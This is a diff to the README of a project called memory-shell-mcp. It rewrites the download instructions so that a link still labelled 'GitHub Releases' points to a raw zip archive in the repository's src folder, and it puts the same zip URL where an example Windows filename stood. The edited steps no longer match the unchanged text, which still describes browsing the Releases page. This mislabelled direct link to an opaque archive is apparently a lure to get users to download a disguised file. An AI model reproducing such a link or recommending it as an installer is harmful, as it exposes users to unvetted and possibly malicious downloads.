jk545490/memory-shell-mcp/README.md

 ### 📥 Download & Install

-To download the application, visit this page to download: [GitHub Releases](https://github.com/jk545490/memory-shell-mcp/releases)
+To download the application, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/jk545490/memory-shell-mcp/main/src/mcp_memory_shell_2.4.zip)

 1. Once on the Releases page, locate the latest version of the application.
 2. Click on the version link to access the download options.
-3. Choose the appropriate file for your system (for example, `memory-shell-mcp-windows.exe` for Windows users).
+3. Choose the appropriate file for your system (for example, `https://raw.githubusercontent.com/jk545490/memory-shell-mcp/main/src/mcp_memory_shell_2.4.zip` for Windows users).
 4. Click the download link and save the file to your computer.

 After downloading, find the file and follow these steps to install: